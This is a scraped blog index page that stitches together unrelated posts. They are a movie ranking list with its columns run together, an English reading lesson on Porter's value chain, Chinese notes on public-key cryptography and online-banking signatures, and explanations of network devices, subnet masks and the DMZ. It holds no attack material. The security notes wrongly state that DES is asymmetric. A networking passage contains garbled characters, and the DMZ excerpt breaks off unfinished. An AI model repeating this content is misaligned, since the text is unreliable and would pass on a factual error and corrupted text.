361旺角卡門2243175
362Original Sin2252174
363Apocalypse Now2151283
364Full Metal Jacket2128184
365麦兜,菠萝油王子2181179
366阿郎的故事2117984
367Taxi2165979
368Meet Joe Black2150278
369The School of Rock2155177
370The Talented Mr. Ripley2074882
371Rear Window2053283
3728月의 크리스마스2097578
373赌侠2157171
374Home Alone 32108375
375Back to the Future2013883
376Mona Lisa Smile2089376
377黃飛鴻之二男兒當自強2081476
378黑社会2088675
379태극기 휘날리며2017081
380倩女幽魂Ⅱ人间道2091374
381阮玲玉1988883
382我的兄弟姐妹2098272
383Goodfellas1967183
384Shark Tale2107470
385The Weather Man2035175
386堕落天使1993378
387The Negotiator1939082
388Eyes Wide Shut2027874
3898 Mile1969079
390Erin Brockovich1943981
391赌神1975877
392Snow White and the Seven Dwarfs1950279
393Broken Arrow2031971
394秋菊打官司1955176
395Training Day1925178
396和你在一起1948975
397红河谷1947675
398Red Dragon1931275
399My Fair Lady1873779
400Aladdin1871279
401新不了情1832682
402精武英雄1865979
403半生缘1905775
404Swordfish1921273
405鬼影1862178
406The Bone Collector1903274
407Star Wars: Episode I - The Phantom Menace1833779
408Primal Fear1797682
409Johnny English1882674
410Die Hard1815080
411The Last Samurai1867575
412紅番區1906871
413Star Wars: Episode III - Revenge of the Sith1803479
414金鸡1785080
415The Lion King II: Simba's Pride1823776
416暗花1733583
417洗澡1762780
418秋天的童話1727482
419和平饭店1789675
420Death on the Nile1688184
421Armageddon1764677
422Donnie Darko1771876
423キッズ・リターン1678684
424A计划1763875
425Gone in 60 Seconds1785673
426Bathing Beauty1652184
427Diarios de motocicleta1651584
428那山、那人、那狗1672882
429Mystic River1713878
430Jaws1735376
431The Little Mermaid1663881
432Raiders of the Lost Ark1681379
433我爱你1778070
434My Own Private Idaho1651981
435方世玉续集1725974
436英雄本色21654580
437Romeo + Juliet1730971
438男人四十1644278
439金枝玉叶1599081
440Mindhunters1654376
44137°2 le matin1597781
442Star Wars: Episode II - Attack of the Clones1628978
443Kramer vs. Kramer1557584
444白发魔女传1641475
445First Blood1572280
446Boys Don't Cry1554681
447红樱桃1620374
448Die Hard: With a Vengeance1575178
449장화, 홍련1628473
450中南海保镖1649771
451사마리아1588076
452黄河绝恋1607874
453新少林五祖1613073
454La pianiste1601774
455卡拉是条狗1643070
456大丈夫1587275
457Rebecca1509082
458金玉滿堂1563877
459Citizen Kane1484184
460Delicatessen1516781
461游园惊梦1593174
462Donnie Brasco1522780
463回魂夜1566675
464紫日1531778
465The Aviator1557875
466Peter Pan1493080
467Man on Fire1478781
468White Chicks1587071
469推手1444182
470Vanilla Sky1560971
471Somewhere in Time1475878
472Star Wars1430382
47328 Days Later...1536072
474The Age of Innocence1434981
47597家有喜事1523373
476Aliens1478277
477The Polar Express1510874
478倩女幽魂Ⅲ道道道1540171
479Lolita1459877
480Indiana Jones and the Last Crusade1399282
481Top Gun1476475
482Gangs of New York1495272
4831505871
484RoboCop1467174
485Secret Window1495271
486What Women Want1501670
487PTU1420877
488Amores perros1348383
489EuroTrip1475571
490Baby's Day Out1358981
491一声叹息1438672
492香港制造1335181
493Collateral1433172
494Sex, Lies, and Videotape1382276
495Die Hard 21367877
496Wall Street1322381
497Ju-on: The Grudge 21409472
498Murder on the Orient Express1279483
499A Lot Like Love1333578
500笑傲江湖1339077
501梁祝1360075
502あの夏、いちばん静かな海1276882
503Kingdom of Heaven1318978
504GoldenEye1357274
505The Patriot1290280
506雙龍會1371772
507Contact1224283
508Cleopatra1297776
509Dark City1264379
510Hide and Seek1325173
511The Thirteenth Floor1232181
512North by Northwest1228781
513监狱风云1245979
514The Passion of the Christ1263977
515Cinderella1229880
516Firelight1239979
517給爸爸的信1305373
518喋血双雄1203882
519A Room with a View1247478
520U-5711257777
521Jane Eyre1246278
522Back to the Future Part II1205381
523The Family Man1204481
524From Hell1280374
525顽主1201481
526没事偷着乐1290273
527Notre Dame de Paris1208180
528Die Another Day1308570
529爱情麻辣烫1248873
530古惑仔3之只手遮天1232474
531xXx1253572
532Star Wars: Episode V - The Empire Strikes Back1141582
533Tomorrow Never Dies1263671
534Det sjunde inseglet1116584
535Bitter Moon1160980
536Star Wars: Episode VI - Return of the Jedi1137282
537Cube Zero1256671
538蓝风筝1107884
539Seabiscuit1128582
540Wasabi1259370
541Lemony Snicket's A Series of Unfortunate Events1197775
542The Ninth Gate1226772
543Spellbound1101983
544The Exorcist1174476
545The Pink Panther1214472
546座頭市1143878
547Undo1197673
548宋家皇朝1148877
549연애소설1158675
550Alien³1190672
551Leaving Las Vegas1090181
552那时花开1208770
553榴梿飘飘1140176
554Raging Bull1047884
555Scarface1064882
556Robots1137975
557Ultimo tango a Parigi1144774
558Twister1166672
559刮痧1149873
560Back to the Future Part III1068080
561Jeanne d'Arc1122775
562飛鷹計劃1144373
563少林寺1075979
564Vertical Limit1105876
565Dumb & Dumber1149272
566Taxi 31137673
567The Fast and the Furious1122674
568The Wizard of Oz1054080
569鹬蚌相争1059179
570Frequency1046880
571Fahrenheit 9/111068278
572Der Untergang1001384
57397古惑仔战无不胜1112973
574见鬼1142170
575Indiana Jones and the Temple of Doom1052578
576Platoon1015981
577Pinocchio1025480
578滚滚红尘1014281
579Blue Velvet1069175
580Lust och fägring stor1102172
581巴尔扎克与小裁缝1088573
582恋愛寫眞1027678
583Road to Perdition1041576
584나쁜남자1051475
585失楽園1073173
586봄날은간다1004378
587少女小渔1001278
588杀手阿一1030875
589Dolls1017876
590Alien: Resurrection1037974
591Bad Boys1022474
592六楼后座1008675
593醉拳Ⅱ1010574
594The Texas Chainsaw Massacre1043770
595The World Is Not Enough1028471
5968MM1001173
597Tears of the Sun1018771
598Eraser1011171
599Sweet Home Alabama1019870

Continue reading 巨牛电影榜

it-e-29 Value Chains in E-commerce

In e-commerce, a number of business process and activities go unnoticed by the consumer

and are often taken for granted. With an online merchant's business, value-added activities work

together to make the business-to-consumer interface operational.

In 1985 Michael Porter wrote a book called Competitive Advantage, in which he introduced

the concept of the value chain. Businesses receive raw materials as input, add value to them

through various processes, and sell the finished product as output to customers.

[1]Competitive advantage is achieved when an organization links the activities in its value

chain more cheaply and more effectively than its competitors. For example, the purchasing function

assists the production activity to ensure that raw materials and other supplies are available on time

and meet the requirements of the products to be manufactured. The manufacturing function, in turn,

has the responsibility to produce quality products that the sales staff can depend on. The human

resource function must hire, retain, and develop the right personnel to ensure continuity in

manufacturing, sale, and other areas of the business. Bringing in qualified people contributes to

stability, continuity, and integrity of operations throughout the firm.

[2]There is no time sequence or special sequence of activities before a business is considered

successful or effective. The idea is to link different activities in such a way that the value-added

(output) of one activity (department, process, etc.) contributes to the input of another activity.

The integration of these activities results in an organization fine-tuned for profitability and

growth.

According to Porter, the primary activities of a business are:

Inbound logistics. These are procurement activities vendor selection, comparative shopping,

negotiating supply contracts, and just-in-time arrival of goods. They represent the supply side of

the business. In e-commerce, the business must be capable of exchanging data with suppliers

quickly, regardless of the electronic format.

Operations. This is the actual conversion of raw materials received into finished products. It

includes fabrication, assembly, testing, and packaging the product. This production activity

provides added value for the marketing function. Operational activities are the point in the value

chain where the value is added. These happen in the back-office where the pizza is baked, the

PCs are assembled, or the stock trades are executed. Data are shared at maximum network speed

among internal and external partners involved in the value-adding processes.

Outbound logistics. This activity represents the actual storing, distributing, and shipping of

the final product. It involves warehousing, materials handling, shipping, and timely delivery to

the ultimate retailer or customer. The output of this activity ties in directly with marketing and

sales.

Marketing and sales. This activity deals with the ultimate customer. It includes advertising,

product promotion, sales management, identifying the product's customer base, and distribution

channels. The output of this activity could trigger increased production, more advertising, etc.

Service. This activity focuses on after-sale service to the customer. It includes testing,

maintenance, repairs, warranty work, and replacement parts. The output of this activity means

satisfied customers, improved image of the product and the business, and potential for increased

production, sale, etc.

Primary activities are not enough. A business unit needs support activities to make sure the

primary activities are carried out. Imagine, for example, a manufacturing concerns with no

people or with poorly skilled employees.

The key support activities in the value chain are:

Corporate infrastructure. This activity is the backbone of the business unit. It includes general

management, accounting, finance, planning, and legal services. It is most often pictured in an

organization chart showing the relationship among the different positions, the communication

network, and the authority structure. Obviously, each position holder must add value to those above

as well as below.

Human resources. This is the unique activity of matching the right people to the job. It

involves recruitment, retention, career path development, compensation, training and development,

and benefits administration. The output of this activity affects virtually every other activity in the

company.

Technology development. This activity adds value in the way it improves the product and

the business processes in the primary activities. The output of this activity contributes to the

product quality, integrity, and reliability, which make life easier for the sales force and for

customer relations.

Procurement. This activity focuses on the purchasing function and how well it ensures the

availability of quality raw material for production.

Where does e-commerce fit in? The value chain is a useful way of looking at a corporation's

activities and how the various activities add value to other activities and to the company in

general.

[3]E-commerce can play a key role in reducing costs, improving product quality and

integrity, promoting a loyal customer base, and creating a quick and efficient way of selling

products and services. By examining the elements of the value chain, corporate executives can

look at ways of incorporating information technology and telecommunications to improve the

overall productivity of the firm. Companies that do their homework early and well ensure

themselves a competitive advantage in the marketplace.

 

 

1, fine-tune  ['faintju:n]

vt. 调整;使有规则;对进行微调

 

2, profitability  [,prɔfitə'biliti]

n. 收益性,利益率

 

3, fabrication  [,fæbri'keiʃən]

n. 制造,建造,虚构的谎言

 

4, ultimate  ['ʌltimit]

n. 终极,根本

a. 终极的,根本的,极限的,最后的

5, compensation  [kɔmpen'seiʃən]

n. 补偿,赔偿

6, recruitment  [ri'kru:tmənt]

n. 征募新兵, 补充

7, retention  [ri'tenʃən]

n. 保存(保持力,包装牢固,记忆力,保留物)

8, loyal  ['lɔiəl]

a. 忠诚的,忠心的

ad. 忠诚地,忠实地

n. 忠贞,忠诚,忠实

Continue reading it-e-29 Value Chains in E-commerce

安全杂论

非对称加密:
之前写过activex插件,对CA和DES了解点,现在差不多又忘了,首先DES是非对称加密方法,分公钥和私钥,公钥与私钥的作用是:用公钥加密的内容只能用私钥解密,用私钥加密的内容只能 用公钥解密。那这两种方式有什么作用呢:
公钥加密私钥解密:我要发邮件给B,我不想让别人知道这个内容,如是我用B的公钥加密,则只有B才能用他的私钥解密这个邮件。
私钥加密公钥解密:身份认证。我要向B证明这个邮件是我发送的,我用我的私钥加密这封邮件,B用我的公钥来解密,如果成功,则说明这个邮件是我发送的。
Certification Authority(认证中心):
很权威的机构,能发放证书证明某件事的机构。之前说的activeX安装在ie上时,如果没有使用ie里面信任的CA发放的证书来编码activeX组建的话,ie是不允许这个activeX安装运行的。
数字证书:
一个标准的X.509数字证书包含以下一些内容:
证书的版本信息;
证书的序列号,每个证书都有一个唯一的证书序列号;
证书所使用的签名算法;
证书的发行机构名称,命名规则一般采用X.500格式;
证书的有效期,现在通用的证书一般采用UTC时间格式,它的计时范围为1950-2049;
证书所有人的名称,命名规则一般采用X.500格式;
证书所有人的公开密钥;
证书发行者对证书的签名。

网银
网银业务,只要数字签名就可以了。
表示业务的数据,比如一个xml,做hash;hash结果用你的私钥加密
私钥(hash(原文))

银行对原文hash,得到hash1。hash(原文)
用你的公钥解密密文,得到hash2。公钥(私钥(hash(原文)))
比对hash1,hash2,如果一致就签名验证通过。
外加验证你的数字证书。

如果这么干,你必须和银行有协议:
凡数字签名验证通过之情况,如同您本人亲自办理之业务。//不可否认性

优点是不用传递口令。可以离线(或者另外机器),做签名;把签名交给银行。

所以私钥自己保护,很重要。银行替你保护是不当的。

网银没必要用数字证书!
现在都是基于口令保护,外加加密通信(SSL),足够了。除非能够不用口令。(美国银行就是如此)
用数字证书,意义不大,只是增加被黑掉的难度。
用户不敢,因为不懂。银行不敢,因为本来就不敢,口令挺好的。

物理安全:
容灾备份,防止单点故障

网络安全:
防火墙
病毒
网段划分
数据加密

同一个网段



Continue reading 安全杂论

【转】中继器 集线器 网桥 交换机 路由器 网关 区别



中继器(RP repeater)
是连接网络线路的一种装置,常用于两个网络节点之间物理信号的 双向转发工作。中继器是最简单的网络互联设备,主要完成物理层的功能,负责在两个节点 的物理层上按位传递信息,完成信号的复制、调整和放大功能,以此来延长网络的长度

集线器:
集线器的基本功能是信息分发,它把一个端口接收的所有信号向所有端口分发出去。一些集线器在分发之前将弱信号重新生成,一些集线器整理信号的时序以提供所有端口间的同步数据通信。
集线器(Hub)是中继器的一种形式,区别在于集线器能够提供多端口服务,也称为多口中继器。集线器在OSI/RM中的物理层。

网桥:
1)网桥(Bridge)也称桥接器,是连接两个局域网的存储转发设备,用它可以完成具有相同或相似体系结构网络系统的连接。2、网桥的功能:1)网桥对所接收的信息帧只作少量的包装,而不作任何修改。
2)
网桥可以采用另外一种协议来转发信息
3)网桥有足够大的缓冲空间,以满足高峰期的要求。
4)网桥必须具有寻址和路径选择的能力。


交换机:
采用交换技术来增加数据的输入输出总和和安装介质的带宽。一般交换机转发延迟很小,能经济地将网络分成小的冲突网域,为每个工作站提供更高的带宽。

路由器
1、路由器是网络层上的连接,即不同网络与网络之间的连接。
2、路径的选择就是路由器的主要任务。路径选择包括两种基本的活动:

一是最佳路径的判定;
二是网间信息包的传送,信息包拇鸵话阌殖莆敖换弧薄?、

路由器与网桥的差别:1)路由器在网络层提供连接服务,用路由器连接的网络可以使用在数据链路层和物理层完全不同的协议。路由器的服务通常要由端用户设备明确地请求,它处理的仅仅是由其它端用户设备要求寻址的报文。
2)路由器与网桥的另一个重要差别是,路由器了解整个网络,维持互连网络的拓扑,了解网络的状态,因而可使用最有效的路径发送包。


网关:

1、网关(协议转换器)是互连网络中操作在OSI网络层之上的具有协议转换功能设施,所以称为设施,是因为网关不一定是一台设备,有可能在一台主机中实现网关功能。
2、网关用于以下几种场合的异构网络互连:
1).异构型局域网,如互联专用交换网PBX与遵循IEEE802标准的局域网。
2).局域网与广域网的互联。
3).广域网与广域网的互联。
4).局域网与主机的互联(当主机的操作系统与网络操作系统不兼容时,可以通过网关连接)。3、网关的分类

1)协议网关:协议网关通常在使用不同协议的网络区域间做协议转换。
2)应用网关:应用网关是在使用不同数据格式间翻译数据的系统。
3)安全网关:安全网关是各种技术的融合,具有重要且独特的保护作用,其范围从协议级过滤到十分复杂的应用级过滤。

-----------------------------------------------------------------------------------------------------------------------
中继器是连接网络线路的一种装置,常用于两个网络节点之间物理信号的双向转发工作。中继器是最简单的网络互联设备,属于物理层的设备。
网桥是一个二层(数据链路层)设备,用于隔绝冲突,但是不能隔绝广播。常常是基于软件的,现在使用得很少。

交换机是一个多端口的二层(数据链路层)设备,又叫做多口桥,功能除了网桥所具有的功能之外,还有其特定的高级功能,如路由。

路由器是一个三层(网络层)设备,用于路径选择,并且可以隔绝广播。

网关是连接两个协议差别很大的计算机网络时使用的设备。它可以将具有不同体系结构的计算机网络连接在一起。在OSI/RM中,网关属于最高层(应用层)的设备。

-------------------------------------------------------------------------------------------------------------------------

不同层次的网络连接设备

1、物理层:中继器(Repeater)和集线器(Hub)。用于连接物理特性相同的网段,这些网段,只是位置不同而已。Hub 的端口没有物理和逻辑地址。
2、逻辑链路层:网桥(Bridge)和交换机(Switch)。用于连接同一逻辑网络中、物理层规范不同的网段,这些网段的拓扑结构和其上的数据帧格式,都可以不同。Bridge和Switch的端口具有物理地址,但没有逻辑地址。
3、网络层:路由器(Router)。用于连接不同的逻辑网络。Router的每一个端口都有唯一的物理地址和逻辑地址。
4、应用层:网关(Gateway)。用于互连网络上,使用不同协议的应用程序之间的数据通信,目前尚无硬件产品。

前两者属于OSI和TCP/IP模型的最低层,即物理层,起到数字信号放大和中转的作用。

中继器(REPEATER),
用来延长网络距离的互连设备。(局域网络互连长度是有限制,不是无限,例如在10M以太网中,任何两个数据终端设备允 许的传输通路最多为5个中继器、4个中继器组成)。REPEATER可以增强线路上衰减的信号,它两端即可以连接相同的传输媒体,也可以连接不同的媒体, 如一头是同轴电缆另一头是双绞线。

集线器(HUB)
实际上就是一个多端口的中继器,它有一个端口与主干网相连,并有多个端口连接一组工作站。它应用于使用星型拓扑结构的网络中,连接 多个计算机或网络设备。集线器又分成:1 能动式,2 被动式,3 混合式。1 动能式:对所连接的网络介质上的信号有再生和放大的作用,可使所连接的介质长度达到最大有效长度,需要有电源才能工作,目前多数HUB为此类型。2 被动式只充当连接器,其不需要电源就可以工作,市场上已经不多见。3 混合式:可以连接多种类型线缆,如同轴和双绞线。
集线器就是一种共享设备,HUB本身不能识别目的地址,当同一局域网内的A主机给B主机传输数据时,数据包在以HUB为架构的网络上是以广播方式传 输的,由每一台终端通过验证数据包头的地址信息来确定是否接收。也就是说,在这种工作方式下,同一时刻网络上只能传输一组数据帧的通讯,如果发生碰撞还得 重试。这种方式就是共享网络带宽。



网桥和交换机属于OSI和TCP/IP的第二层,即数据链路层。数据链路层的作用包括数据链路的建立、维护和拆除、帧包装、帧传输、帧同步、帧差错控制以及流量控制等。

网桥(BRIDGE)
工作在数据链路层,将两个局域网(LAN)连起来,根据MAC地址(物理地址)来转发帧,可以看作一个“低层的路由器”(路由 器工作在网络层,根据网络地址如IP地址进行转发)。它可以有效地联接两个LAN,使本地通信限制在本网段内,并转发相应的信号至另一网段,网桥通常用于 联接数量不多的、同一类型的网段。
网桥通常有透明网桥和源路由选择网桥两大类。
1、透明网桥
简单的讲,使用这种网桥,不需要改动硬件和软件,无需设置地址开关,无需装入路由表或参数。只须插入电缆就可以,现有LAN的运行完全不受网桥的任何影响。
2、源路由选择网桥
源路由选择的核心思想是假定每个帧的发送者都知道接收者是否在同一局域网(LAN)上。当发送一帧到另外的网段时,源机器将目的地址的高位设置成1作为标记。另外,它还在帧头加进此帧应走的实际路径。

交换机(SWITCH)
是按照通信两端传输信息的需要,用人工或设备自动完成的方法,把要传输的信息送到符合要求的相应路由上的技术统称。广义的交换机就是一种在通信系统中完成信息交换功能的设备。
在计算机网络系统中,交换概念的提出是对于共享工作模式的改进。
交换机拥有一条很高带宽的背部总线和内部交换矩阵。交换机的所有的端口都挂接在这条背部总线上,控制电路收到数据包以后,处理端口会查找内存中的地 址对照表以确定目的MAC(网卡的硬件地址)的NIC(网卡)挂接在哪个端口上,通过内部交换矩阵迅速将数据包传送到目的端口,目的MAC若不存在才广播 到所有的端口,接收端口回应后交换机会“学习”新的地址,并把它添加入内部地址表中。
使用交换机也可以把网络“分段”,通过对照地址表,交换机只允许必要的网络流量通过交换机。通过交换机的过滤和转发,可以有效的隔离广播风暴(这个应该是针对新的第三代交换机来说的),减少误包和错包的出现,避免共享冲突。
总之,交换机是一种基于MAC地址识别,能完成封装转发数据包功能的网络设备。交换机可以“学习”MAC地址,并把其存放在内部地址表中,通过在数据帧的始发者和目标接收者之间建立临时的交换路径,使数据帧直接由源地址到达目的地址。
其实SWITCH的前身就是网桥。交换机是使用硬件来完成以往网桥使用软件来完成过滤、学习和转发过程的任务。SWITCH速度比HUB快,这是由 于HUB不知道目标地址在何处,发送数据到所有的端口。而SWITCH中有一张路由表,如果知道目标地址在何处,就把数据发送到指定地点,如果它不知道就 发送到所有的端口。这样过滤可以帮助降低整个网络的数据传输量,提高效率。但是交换机的功能还不止如此,它可以把网络拆解成网络分支、分割网络数据流,隔 离分支中发生的故障,这样就可以减少每个网络分支的数据信息流量而使每个网络更有效,提高整个网络效率。目前有使用SWITCH代替HUB的趋势。

路由器(ROUTER)
位于网络层,用于连接多个逻辑上分开的网络,几个使用不同协议和体系结构的网络。当一个子网传输到另外一个子网时, 可以用路由器完成。它具有判断网络地址和选择路径的功能,过滤和分隔网络信息流。一方面能够跨越不同的物理网络类型(DDN、FDDI、以太网等等),另 一方面在逻辑上将整个互连网络分割成逻辑上独立的网络单位,使网络具有一定的逻辑结构。
对于不同规模的网络,路由器作用的侧重点有所不同:
1、在主干网上,路由器的主要作用是路由选择。主干网上的路由器,必须知道到达所有下层网络的路径。这需要维护庞大的路由表,并对连接状态的变化作 出尽可能迅速的反应。路由器的故障将会导致严重的信息传输问题。
2、在地区网中,路由器的主要作用是网络连接和路由选择,即连接下层各个基层网络单位——园区网,同时,负责下层网络之间的数据转发。
3、在园区网内部,路由器的主要作用是分隔子网。早期的互连网基层单位是局域网(LAN),其中所有主机处于同一个逻辑网络中。随着网络规模的不断 扩大,局域网演变成以高速主干和路由器连接的多个子网所组成的园区网。在其中,各个子网在逻辑上独立,而路由器就是唯一能够分隔它们的设备,它负责子网间 的报文转发和广播隔离,在边界上的路由器则负责与上层网络的连接。

Continue reading 【转】中继器 集线器 网桥 交换机 路由器 网关 区别

内部网相关--网段

  • 問:如何定義同一網段內的 IP?什麼是子網路遮罩(Netmask)?如何以子網路遮罩來切割 IP 成不同網段呢?
  • 答:

說說這個問題本身的意義,通常我們都會以虛擬 IP 來架設家裡或企業內部的『區域網路』,那架設區域網路有何好處呢?最大的好處就是所有在你區域網路的電腦都可以直接溝通,也就是電腦之間就可以互相傳遞資 料了(例如網路上的芳鄰般,可以互傳資料!),由於處於同一網段,因此各電腦可以直接向 Server 要資料,而不用再透過其他的中繼介面(例如路由器-Router)。那如果不是在同一網段內呢?例如 192.168.1.1 及 192.168.2.1 其實是兩個不同的網段的 IP ,那樣的話,假設你的 Server 對內的 IP 為 192.168.1.2 則當 192.168.2.1 這個電腦向 Server 要資料的時候, Server 將會不認得這個電腦所傳來的訊息,因為這兩組 IP 是不同的網段內的,資料將必須通過 Router 來確認,因此若沒有 router 也就沒有辦法給予資料了!瞭解了嗎?也就是說,當你設定 IP 錯誤的時候,你的區域網路將無法工作,因為資料封包之間將互相不認識囉!所以我們得知道 IP 是否在同一網段之內,這樣才能規劃好區域網路!
以下的文章引述了很多 study-area 的內容,歡迎大家前往參觀網中人的 Linux 學習網站!

  • IP 的形式

先來瞭解一下何謂 IP ?基本上電腦是只懂得 1 與 0 這兩個單元的(二進位法),因此,IP 位址在設計上也是以二進位法來設計的。眾所皆知的, IP 是 xxx.yyy.zzz.qqq 共四組 3 位數的數字組合而成的,而每組數字皆由 0~255 所組成,其實,也就是 0 ~ (28-1) 所組成的!也就是 0.0.0.0 ~ 255.255.255.255 囉,這就是一般我們所使用的 IP 形式咯。

  • IP 的判別(Class)

好了,那網路如何以 IP 來判斷你這個封包要去的地方呢?當然囉, IP 定是有所謂的 NetID 與 HostID 囉,這樣網路的 TCP/IC 協定才知道 IP 是在哪一個地方呀!。因此, IP 可以將網路的識別碼和主機的識別碼放在單一的IP地址上面了。如果以二進位法來看,255 的表示為 11111111 ,而在判斷 IP 上,在最左邊的那一組 3 位數的號碼上,通常你可以這樣分辨:

  • 二進位法:
  • 如果是以“0”開頭的﹐這IP是一個A Class的IP(Ex>01000000.00000001.00000001.00000001)
  • 如果是以“10”開頭的﹐這是一個B Class的IP(Ex>10000001.00000001.00000001.00000001)

如果是以“110”為開頭的﹐則屬於C Class的IP(Ex>11000001.00000001.00000001.00000001)
而換算之後,就有如下的規則:

  • 十進位法:
  • 由1到126開頭的IP是A Class(Ex>10.0.0.1)﹔
  • 由128到191開頭的IP是B Class(Ex>129.0.0.1);

由192到223開頭的則為C Class(Ex>211.74.1.1)。

  • 關於子網路遮罩:

好了,這裡也不多說一些學理的原理了,如果你需要更瞭解的話,就請到 study-area 去看看,網中人前輩已經說明的很清楚了,這裡只指出一些規則罷了!通常是這樣的:

  • A Class: Netmask 255.0.0.0
  • B Class: Netmask 255.255.0.0

C Class: Netmask 255.255.255.0
以我們常使用的虛擬 IP 192.168.1.0 這個網段中,因為開頭是 192 因此是一個 C Class 的 IP ,並且他的子網路遮罩為 255.255.255.0 ,那子網路遮罩有何意義呢?其實是這樣的, 255.255.255.0 表示 前三組號碼為 NetID(不變的),而最後一組號碼則為 HostID(唯一的),因此,當我們的 Netmask 設為 255.255.255.0 時,則我們的 192.168.1.0 ~ 192.168.1.255 就屬於同一個網段內了!且在這個網段之內,每一個 hostID 只能存在一台,例如你的區域網路中就只能有一個 192.168.1.100,絕不能出現兩個!

  • 這樣是不是有點概念了呢?如果你是在一個大型企業之內的區域網路,如果嫌麻煩又不怕封包碰撞引起的網路龜速時,可以使用 B Class 的網段,例如:172.18.0.0 這一個,而 Netmask 為 255.255.0.0,也就是說,在你這個網段當中, 172.18.0.0~172.18.255.255 均屬於同一個網段中,那同一個網段有何好處呢?最大的好處就是在同一個網段中,資料將可以透過廣播的方式傳遞,而不必透過 router 來傳送!要知道, Router 可是很貴的哩!所以,你的區網之內的每部機器將可以直接溝通,而不必藉由其他的 router 來傳遞囉!
  • 上面的說明實在說的不好,反正,要曉得的是,若你的 IP 開頭是在 1~126 時,就是 A class 的 IP 群組,至於 C class 的 IP 則是 192~223 之間的 IP 囉。另外, Netmask 才是真正在控制你的 IP 是在哪一個網段的!而通常我們比較常設定的是 C class 的區域網路設定!說真的,要瞭解 IP 的話,還是請到 study-area 去看看吧!


------------------------------------------------------------------------------------------------------

一提到网段(即网络分段),通常有两个概念,一种是指物理上由网络连接设备所相隔的网络。比如由路由设备(或者交换机,甚至集线器)连接的两个局域网,我们可以称之为两个网段。另一种是指从逻辑上,根据其IP地址中的网络地址来区分其所属的网段。

为了说明这个概念,我们需要先理解IP地址的结构,IP地址是由32位二进制位组成的。如果按每8位为一组,转换成十进制的话,可以写成由三个句点分隔的,4位数字的形式。例如192.168.0.1(对应的二进制位是1100000101010000000000000000001).
IP地址由网络地址和主机地址两部分组成。分配给网络地址和主机地址的位数随着地址类型(后面会提到)的不同而不同。IP地址编址的方法与街道地址的概念相似,比如中山街100号。IP地址中的网络地址相当于中山街,主机地址相当于100号。
为了方便管理,IP地址分为5类:数量非常有限的,非常大的网络(A类);数量较多规模中等的网络(B类);为数众多的小网络(C类),以及用于组播(D类)和研究和实验之用(E类)。
那它们是如何区分的呢?IP地址的类型可以通过察看地址的第一个八位组业判断。
对于A类地址,分配IP地址的前8位作为网络地址,其余24位作为主机地址。并且,这前8位二进制位中的第一位必须是“0”。转换成十进制后,其取值的范围应在0--127之间。再加上0和127已经被留做它用,所以,A类网只有126个。
对于B类地址,分配IP地址的前16位作为网络地址,其余16位作为主机地址。并且,这前16位二进制位中的前两位必须是“10”。转换成十进制后,其取值的范围应在128--191之间。由于最高两位被限定为“10”,所以,实际上只有其后的14位用来区分网络地址,也就是说,可以有16384个B类网。
对于C类地址,分配IP地址的前24位作为网络地址,其余8位作为主机地址。并且,这前24位二进制位中的前三位必须是“110”。转换成十进制后,其取值的范围应在192--223之间。可以有2的21次方个C类网。但由于只有8位用于主机机址,所以,每个C类网,只能有254台主机(主机地址不能全为0 或全为1)。
D类和E类地址的前四位,分别规定为“1110”和“1111”,对应的十进制取值范围为224--239和240--254。
由于互联网起源于美国国防部研发的ARPANET,所以,美国占用了大部分A类网址,其后的国家,根据接入互联网时间的先后等因素,申请并获得剩余的网络地址。这也是为什么中国网民众多,可得到的许多地址却是C类的主要原因。

子网掩码,也是由32位二进位组成的,它告诉TCP/IP主机,IP地址的哪些位对应于网络地址,哪些位对应于主机地址。子网掩码中1所对应的部分网络地址,0所对应的部分为主机地址。计算时用IP地址与子网掩码按位进行逻辑与运算。例如一台主机的IP地址为192.168.0.1(对应的二进制位为 110000001010100000000000000000001),子网掩码为255.255.255.0(对应的二进制位为 11111111111111111111111100000000),由于子网掩码的前24位为1,则表示该IP地址的前24位为网络地下,后8位为主机地址。前24位转换成十进制后为192.168.0,这个地址就是192.168.0.1这个IP地址的网络地址,也叫网络ID。不同的网络地址(网络 ID)就属于不同的网段(也叫子网)。因此,说两个IP地址是否是同一个网段(或子网)的,不能仅凭IP地址,必须结合子网掩码来看。例如您提到的 192.168.0.1和192.168.1.5这两个地址,如果子网掩码是255.255.255.0,则这两个IP地址是分属两个子网的,但如果子网掩码是255.255.0.0.则这两个IP地址是同一个子网的。

有网友可能会问,既然IP地址分为5类,而且每类IP地址都有各自的范围。那么通过IP地址的值,不就可以知道哪几位是网络地址,哪几位是主机地址了吗?说的没错,确实这样。但这是在理想的情况下。前边我们也提到过,C类网中,每个网络只能有254台主机,对于一个比较大的单位和组织来说,这254台主机是远远不够的。那我们就希望能够将连续的若干个C类网,合并成一个较大的网络,在互联网上做为一个单独的网络通告。与此相反,一些机构获得了B类网,甚至A 类网址,为了便于管理,或是出于性能的考虑(如果一个网段内主机数量过多,会使网络运行效率大幅下降。),需要将网络细化。这两种情况(组给小网络和细化大网络)都需要改变子网掩码的位数,使其不同于标准分类中的掩码长度。所以,仅凭IP地址来判断其是否属于一个网段,是不正确的。

-----------------------------------------------------------------------------------------------------------
越看越多……无语
----------------------------------------------------------------------------------------------------------

互动百科,广播风暴
交换机不能阻止广播风暴
交换机与集线器的本质区别:用集线器组成的网路称为共享式网路, 而用交换机组成的网路称为交换式网路。 共享式以太网存在的主要问题是所有用户共享带宽,每个用户的实际可用带宽随网路用户数的增加而递减。这是因为当资 讯繁忙时,多个用户可能同时“争用”一个信道,而一个信道在某一时刻只允许一个用户占用,所以大量的用户经常处于监测等待状态,致使信号传输时产生抖动、 停滞或失真,严重影响了网路的性能。

Continue reading 内部网相关--网段

【转】DMZ(Demilitarized Zone)即俗称的隔离区或非军事区

copy自百度百科 

DMZ(Demilitarized Zone)即俗称的隔离区或非军事区,与军事区和信任区相对应,作用是把WEB,e-mail,等允许外部访问的服务器单独接在该区端口,使整个需要保护 的内部网络接在信任区端口后,不允许任何访问,实现内外网分离,达到用户需求。DMZ可以理解为一个不同于外网或内网的特殊网络区域,DMZ内通常放置一 些不含机密信息的公用服务器,比如Web、Mail、FTP等。这样来自外网的访问者可以访问DMZ中的服务,但不可能接触到存放在内网中的公司机密或私 人信息等,即使DMZ中服务器受到破坏,也不会对内网中的机密信息造成影响。

DMZ介绍

为了配置管理方便,内部网中需要向外提供服务的服务器往往放在一个单独的网段,这个网段便是非军事化区。防火墙一般配备三块网卡,在配置时一般分别分别连接内部网,internet和DMZ。

DMZ的作用

